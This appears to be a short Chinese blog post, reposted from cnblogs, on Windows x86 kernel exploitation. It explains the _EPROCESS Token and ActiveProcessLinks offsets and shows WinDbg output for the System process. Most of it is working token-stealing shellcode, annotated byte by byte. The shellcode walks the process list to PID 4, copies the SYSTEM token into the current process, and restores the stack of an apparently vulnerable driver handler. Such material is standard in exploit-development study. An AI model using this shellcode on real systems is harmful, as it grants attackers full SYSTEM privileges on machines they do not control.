标签:store protect ima flink ble creation 获取 work 循环
PROCESS 结构中的Token 偏移,在x86 系统中偏移0xf8
进程由双链表组成,通过_LIST_ENTRY 来链接,通过循环进程偏移0xb8 来获取所有进程偏移0xb8的地址
kd> !process 0 0 system
PROCESS 860dac78 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000
DirBase: 00185000 ObjectTable: 8c001bb8 HandleCount: 518.
Image: System
kd> dt _EPROCESS 860dac78
ntdll!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x098 ProcessLock : _EX_PUSH_LOCK
+0x0a0 CreateTime : _LARGE_INTEGER 0x1d3f694`30d11160
+0x0a8 ExitTime : _LARGE_INTEGER 0x0
+0x0b0 RundownProtect : _EX_RUNDOWN_REF
+0x0b4 UniqueProcessId : 0x00000004 Void
+0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x870676d8 - 0x8416f368 ]
+0x0c0 ProcessQuotaUsage : [2] 0
+0x0c8 ProcessQuotaPeak : [2] 0
+0x0d0 CommitCharge : 0xb
+0x0d4 QuotaBlock : 0x841631c0 _EPROCESS_QUOTA_BLOCK
+0x0d8 CpuQuotaBlock : (null)
+0x0dc PeakVirtualSize : 0x770000
+0x0e0 VirtualSize : 0x1f0000
+0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x0ec DebugPort : (null)
+0x0f0 ExceptionPortData : (null)
+0x0f0 ExceptionPortValue : 0
+0x0f0 ExceptionPortState : 0y000
+0x0f4 ObjectTable : 0x8c001bb8 _HANDLE_TABLE
+0x0f8 Token : _EX_FAST_REF
+0x0fc WorkingSetPage : 0
+0x100 AddressCreationLock : _EX_PUSH_LOCK
+0x104 RotateInProgress : (null)
+0x108 ForkInProgress : (null)
SHELLCODE
"\x60" // pushad ; Save register state on the Stack
"\x64\xA1\x24\x01\x00\x00" // mov eax, fs:[KTHREAD_OFFSET] ; nt!_KPCR.PcrbData.CurrentThread
"\x8B\x40\x50" // mov eax, [eax + EPROCESS_OFFSET] ; nt!_KTHREAD.ApcState.Process
"\x89\xC1" // mov ecx, eax (Current _EPROCESS structure)
"\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET] ; nt!_EPROCESS.Token
//---[Copy System PID token]
"\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID) ; PID 4 -> System
"\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-| ; nt!_EPROCESS.ActiveProcessLinks.Flink
"\x2D\xB8\x00\x00\x00" // sub eax, FLINK_OFFSET |
"\x39\x90\xB4\x00\x00\x00" // cmp [eax + PID_OFFSET], edx | ; nt!_EPROCESS.UniqueProcessId
"\x75\xED" // jnz ->| ; Loop !(PID=4)
"\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET] ; System nt!_EPROCESS.Token
"\x89\x91\xF8\x00\x00\x00" // mov [ecx + TOKEN_OFFSET], edx ; Replace Current Process token
//---[Recover]
"\x61" // popad ; Restore register state from the Stack
"\x81\xC4\x8C\x07\x00\x00" // add esp,0x78c ; Offset of IRP on stack
"\x8B\x3C\x24" // mov edi,DWORD PTR [esp] ; Restore the pointer to IRP
"\x83\xC4\x08" // add esp,0x8 ; Offset of DbgPrint string
"\x8B\x1C\x24" // mov ebx,DWORD PTR [esp] ; Restore the DbgPrint string
"\x81\xC4\x34\x02\x00\x00" // add esp,0x234 ; Target frame to return
"\x31\xC0" // NTSTATUS -> STATUS_SUCCESS :p
"\x5D" // pop ebp ; Restore saved EBP
"\xC2\x08\x00" // ret 8 ; Return cleanly
标签:store protect ima flink ble creation 获取 work 循环
原文地址:https://www.cnblogs.com/yizhanlvcha/p/9102973.html